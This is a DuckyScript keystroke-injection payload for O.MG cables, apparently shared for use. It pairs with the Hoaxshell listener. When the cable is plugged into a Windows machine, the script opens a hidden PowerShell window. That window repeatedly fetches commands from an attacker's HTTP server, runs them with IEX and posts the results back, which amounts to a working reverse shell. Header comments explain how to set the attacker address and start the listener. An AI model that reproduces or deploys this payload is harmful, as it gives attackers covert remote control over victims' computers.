REM OMGHoax REM Version 1.0 REM OS: Windows REM Author: rf_bandit REM Thank You: t3l3machus, 0i41E REM Requirements: Firmware Version 3.0+ REM Simple way to use the Hoaxshell standalone listener with OMG cables/plug REM This version uses Powershell IEX PowerShell Constraint Language Mode. REM Payload can be easily adapted to use other HoaxShell PS payloads --- simply paste the payload inside the first set of curly braces after -ScriptBlock REM eg -ScriptBlock { ##PAYLOAD##} REM On attacking machineinstall Hoaxshell listener Standalone Listener ( REM run python3 -t ps-iex-cm REM Or use python3 -c "$(curl -s" -t ps-iex-cm REM If you change the port from 8080, pass it with -p DUCKY_LANG US REM Set address and port of attacking machine DEFINE #ADDRESS ' DEFINE #PORT 8080' DELAY 500 GUI r DELAY 500 STRING cmd /k ENTER DELAY 500 STRINGLN powershell -WindowStyle Hidden Invoke-Command -ScriptBlock {$s=#ADDRESS:#PORT;$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{"Authorization"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{"Authorization"=$i} -Body ($e+$r)} sleep 0.8} }